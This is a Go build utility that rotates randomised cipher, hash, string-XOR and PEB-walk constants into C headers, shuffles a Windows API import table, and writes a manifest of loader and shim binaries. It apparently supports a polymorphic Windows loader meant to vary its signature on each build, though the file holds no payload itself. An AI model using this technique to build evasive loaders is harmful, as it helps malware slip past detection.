// Command buildmeta rotates native build constants and emits the matching Go
// constants and bundle manifest. It runs only while rebuilding loader assets.
package main

import (
	"bufio"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strconv"
	"strings"
)

type poly struct {
	CipherRotations [6]uint32 `json:"cipher_rotations"`
	CipherRounds    uint32    `json:"cipher_rounds"`
	HashRotA        uint32    `json:"hash_rot_a"`
	HashRotB        uint32    `json:"hash_rot_b"`
	HashRounds      uint32    `json:"hash_rounds"`
}

type apiImport struct {
	Module string `json:"module"`
	Name   string `json:"name"`
}

type bundleManifest struct {
	Schema       int             `json:"schema"`
	Poly         poly            `json:"poly"`
	APIImports   []apiImport     `json:"api_imports"`
	PEB1Metadata json.RawMessage `json:"peb1_metadata"`
	PEB2Metadata json.RawMessage `json:"peb2_metadata"`
	SHA256       struct {
		PEB1         string `json:"peb1"`
		PEB2         string `json:"peb2"`
		DispatchShim string `json:"dispatch_shim"`
	} `json:"sha256"`
}

var definePattern = regexp.MustCompile(`(?m)^#define\s+([A-Z0-9_]+)\s+([0-9A-Fa-fxXuU]+)\s*$`)
var apiPattern = regexp.MustCompile(`^XAPI\(\s*([A-Z0-9_]+),\s*"([^"]+)"`)

func main() {
	if len(os.Args) < 2 {
		fatalf("usage: buildmeta rotate INCLUDE_DIR [SEED] | manifest INCLUDE_DIR ASSETS_DIR GO_OUTPUT_OR_DASH")
	}
	var err error
	switch os.Args[1] {
	case "rotate":
		if len(os.Args) < 3 || len(os.Args) > 4 {
			fatalf("usage: buildmeta rotate INCLUDE_DIR [SEED]")
		}
		seedText := ""
		if len(os.Args) == 4 {
			seedText = os.Args[3]
		}
		var seed uint32
		seed, err = chooseSeed(seedText)
		if err == nil {
			err = rotate(os.Args[2], seed)
		}
	case "manifest":
		if len(os.Args) != 5 {
			fatalf("usage: buildmeta manifest INCLUDE_DIR ASSETS_DIR GO_OUTPUT_OR_DASH")
		}
		err = emitManifest(os.Args[2], os.Args[3], os.Args[4])
	default:
		fatalf("unknown buildmeta command %q", os.Args[1])
	}
	if err != nil {
		fatalf("%v", err)
	}
}

func chooseSeed(value string) (uint32, error) {
	if value != "" {
		parsed, err := strconv.ParseUint(value, 0, 32)
		if err != nil {
			return 0, fmt.Errorf("invalid build seed: %w", err)
		}
		if parsed == 0 {
			return 0, fmt.Errorf("build seed must be nonzero")
		}
		return uint32(parsed), nil
	}
	var b [4]byte
	if _, err := rand.Read(b[:]); err != nil {
		return 0, err
	}
	seed := binary.LittleEndian.Uint32(b[:])
	if seed == 0 {
		seed = 0xa5a5a5a5
	}
	return seed, nil
}

func next(state *uint32) uint32 {
	value := *state
	value ^= value << 13
	value ^= value >> 17
	value ^= value << 5
	*state = value
	return value
}

func rotate(includeDir string, seed uint32) error {
	state := seed
	rotation := func() uint32 { return 3 + next(&state)%23 }
	var p poly
	for i := range p.CipherRotations {
		p.CipherRotations[i] = rotation()
	}
	p.HashRotA, p.HashRotB = rotation(), rotation()
	p.CipherRounds = 20 + next(&state)%5*2
	p.HashRounds = 27 + next(&state)%5*2
	shimSalt := next(&state)
	stringXOR := 0x80 | next(&state)&0x7f
	shimPEB := next(&state) & 1
	loaderWipe := next(&state) & 0xff
	loaderDirection := next(&state) & 1
	loaderSalt := next(&state)
	shimWipe := next(&state) & 0xff
	content := fmt.Sprintf(`/* Auto-generated by Churro buildmeta from Fritter gen_poly rules. Do not edit. */
/* Build seed: 0x%08X */
#ifndef POLY_SEED_H
#define POLY_SEED_H
#define CIPHER_R0     %d
#define CIPHER_R1     %d
#define CIPHER_R2     %d
#define CIPHER_R3     %d
#define CIPHER_R4     %d
#define CIPHER_R5     %d
#define CIPHER_ROUNDS %d
#define HASH_ROT_A    %d
#define HASH_ROT_B    %d
#define HASH_ROUNDS   %d
#define SHIM_POLY_SALT 0x%08Xu
#define SHIM_STRING_XOR 0x%02Xu
#define SHIM_PEB_PICK   %d
#define LOADER_WIPE_BYTE 0x%02Xu
#define LOADER_PEB_DIR   %d
#define LOADER_POLY_SALT 0x%08Xu
#define SHIM_WIPE_BYTE   0x%02Xu
#endif
`, seed, p.CipherRotations[0], p.CipherRotations[1], p.CipherRotations[2],
		p.CipherRotations[3], p.CipherRotations[4], p.CipherRotations[5],
		p.CipherRounds, p.HashRotA, p.HashRotB, p.HashRounds, shimSalt,
		stringXOR, shimPEB, loaderWipe, loaderDirection, loaderSalt, shimWipe)
	if err := os.WriteFile(filepath.Join(includeDir, "poly_seed.h"), []byte(content), 0o644); err != nil {
		return err
	}
	master, err := os.Open(filepath.Join(includeDir, "api_master.h"))
	if err != nil {
		return err
	}
	defer master.Close()
	var lines []string
	scanner := bufio.NewScanner(master)
	for scanner.Scan() {
		line := scanner.Text()
		if strings.HasPrefix(strings.TrimSpace(line), "XAPI(") {
			lines = append(lines, line+"\n")
		}
	}
	if err := scanner.Err(); err != nil {
		return err
	}
	if len(lines) == 0 || !strings.Contains(lines[0], `"LoadLibraryA"`) {
		return fmt.Errorf("api_master.h lacks pinned LoadLibraryA slot")
	}
	state = seed ^ 0xdeadbeef
	_ = next(&state)
	for i := len(lines) - 1; i >= 2; i-- {
		j := 1 + int(next(&state)%uint32(i))
		lines[i], lines[j] = lines[j], lines[i]
	}
	apiContent := fmt.Sprintf("/* Auto-generated by Churro buildmeta from Fritter gen_api_shuffle rules. Do not edit. */\n/* Build seed: 0x%08X - slot 0 pinned as LoadLibraryA */\n", seed)
	for _, line := range lines {
		apiContent += line
	}
	if err := os.WriteFile(filepath.Join(includeDir, "api_shuffle.h"), []byte(apiContent), 0o644); err != nil {
		return err
	}
	fmt.Fprintf(os.Stderr, "rotated native constants with seed 0x%08X\n", seed)
	return nil
}

func parsePoly(data []byte) (poly, error) {
	values := make(map[string]uint32)
	for _, row := range definePattern.FindAllSubmatch(data, -1) {
		literal := strings.TrimRight(string(row[2]), "uU")
		value, err := strconv.ParseUint(literal, 0, 32)
		if err != nil {
			return poly{}, fmt.Errorf("invalid %s: %w", row[1], err)
		}
		values[string(row[1])] = uint32(value)
	}
	need := func(key string) (uint32, error) {
		value, ok := values[key]
		if !ok {
			return 0, fmt.Errorf("missing %s in poly_seed.h", key)
		}
		return value, nil
	}
	var p poly
	var err error
	for i := range p.CipherRotations {
		p.CipherRotations[i], err = need(fmt.Sprintf("CIPHER_R%d", i))
		if err != nil {
			return poly{}, err
		}
	}
	for _, field := range []struct {
		name string
		dst  *uint32
	}{{"CIPHER_ROUNDS", &p.CipherRounds}, {"HASH_ROT_A", &p.HashRotA},
		{"HASH_ROT_B", &p.HashRotB}, {"HASH_ROUNDS", &p.HashRounds}} {
		*field.dst, err = need(field.name)
		if err != nil {
			return poly{}, err
		}
	}
	return p, nil
}

func parseAPIImports(data []byte) ([]apiImport, error) {
	modules := map[string]string{
		"KERNEL32_DLL": "kernel32.dll", "NTDLL_DLL": "ntdll.dll",
		"WININET_DLL": "wininet.dll", "OLE32_DLL": "ole32.dll",
		"OLEAUT32_DLL": "oleaut32.dll", "MSCOREE_DLL": "mscoree.dll",
		"SHELL32_DLL": "shell32.dll",
	}
	var result []apiImport
	scanner := bufio.NewScanner(strings.NewReader(string(data)))
	for scanner.Scan() {
		line := strings.TrimSpace(scanner.Text())
		if !strings.HasPrefix(line, "XAPI(") {
			continue
		}
		parts := apiPattern.FindStringSubmatch(line)
		if len(parts) != 3 {
			return nil, fmt.Errorf("malformed API line %q", line)
		}
		module, ok := modules[parts[1]]
		if !ok {
			return nil, fmt.Errorf("unknown API module %s", parts[1])
		}
		result = append(result, apiImport{Module: module, Name: parts[2]})
	}
	if err := scanner.Err(); err != nil {
		return nil, err
	}
	if len(result) == 0 || result[0].Name != "LoadLibraryA" {
		return nil, fmt.Errorf("API shuffle lacks pinned LoadLibraryA slot")
	}
	return result, nil
}

func emitManifest(includeDir, assetsDir, goOutput string) error {
	polyData, err := os.ReadFile(filepath.Join(includeDir, "poly_seed.h"))
	if err != nil {
		return err
	}
	apiData, err := os.ReadFile(filepath.Join(includeDir, "api_shuffle.h"))
	if err != nil {
		return err
	}
	p, err := parsePoly(polyData)
	if err != nil {
		return err
	}
	imports, err := parseAPIImports(apiData)
	if err != nil {
		return err
	}
	manifest := bundleManifest{Schema: 1, Poly: p, APIImports: imports}
	for _, item := range []struct {
		name string
		dst  *json.RawMessage
	}{{"loader_peb1_metadata.json", &manifest.PEB1Metadata},
		{"loader_peb2_metadata.json", &manifest.PEB2Metadata}} {
		data, err := os.ReadFile(filepath.Join(assetsDir, item.name))
		if err != nil {
			return err
		}
		if !json.Valid(data) {
			return fmt.Errorf("invalid %s", item.name)
		}
		*item.dst = data
	}
	for _, item := range []struct {
		name string
		dst  *string
	}{{"loader_peb1_exe_x64.bin", &manifest.SHA256.PEB1},
		{"loader_peb2_exe_x64.bin", &manifest.SHA256.PEB2},
		{"dispatch_shim_exe_x64.bin", &manifest.SHA256.DispatchShim}} {
		data, err := os.ReadFile(filepath.Join(assetsDir, item.name))
		if err != nil {
			return err
		}
		hash := sha256.Sum256(data)
		*item.dst = hex.EncodeToString(hash[:])
	}
	data, err := json.MarshalIndent(manifest, "", "  ")
	if err != nil {
		return err
	}
	if err := os.WriteFile(filepath.Join(assetsDir, "bundle.json"), append(data, '\n'), 0o644); err != nil {
		return err
	}
	if goOutput == "-" {
		return nil
	}
	var source strings.Builder
	source.WriteString("// Code generated by internal/loader/buildmeta. DO NOT EDIT.\npackage wire\n\n")
	fmt.Fprintf(&source, "var DefaultPoly = Poly{CipherRotations: [6]uint32{%d,%d,%d,%d,%d,%d}, CipherRounds: %d, HashRotA: %d, HashRotB: %d, HashRounds: %d}\n\n",
		p.CipherRotations[0], p.CipherRotations[1], p.CipherRotations[2],
		p.CipherRotations[3], p.CipherRotations[4], p.CipherRotations[5],
		p.CipherRounds, p.HashRotA, p.HashRotB, p.HashRounds)
	source.WriteString("var DefaultAPIImports = []APIImport{\n")
	for _, imp := range imports {
		fmt.Fprintf(&source, "\t{%q, %q},\n", imp.Module, imp.Name)
	}
	source.WriteString("}\n")
	return os.WriteFile(goOutput, []byte(source.String()), 0o644)
}

func fatalf(format string, args ...any) {
	fmt.Fprintf(os.Stderr, format+"\n", args...)
	os.Exit(1)
}
